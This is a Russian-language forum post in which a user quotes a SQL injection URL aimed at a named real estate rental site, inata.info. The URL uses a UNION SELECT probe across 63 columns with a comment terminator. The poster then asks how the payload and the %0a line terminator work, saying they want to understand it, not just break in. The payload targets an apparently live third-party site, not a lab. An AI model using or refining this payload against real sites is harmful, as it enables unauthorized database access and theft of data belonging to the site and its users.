|
Познающий
Регистрация: 08.01.2016
Сообщений: 33
С нами:
5445686
Репутация:
0
|
|
Спасибо!
Сообщение от winstrool
↑
возможно в какой-то из колонок нужно корректный параметр поставить:
http://inata.info/realty/rent/11+and+1=0+uNiON sELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34, 35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51 ,52,53,54,55,56,57,58,59,60,61,62,63+--+/
А в чем преимущество данного запроса? Я так понял, единственное отличие, знак конца строки - %0a. Но после него, что не пиши, сервер не выводит ни объект недвижимости, ни ошибку, даже если кавычку поставить. Что он делает в рамках инъекции? И что ты имеешь ввиду под корректным параметром?
Извини за такое кол-во вопросов, но хочется именно понимать, а не просто взломать. Буду очень признателен) |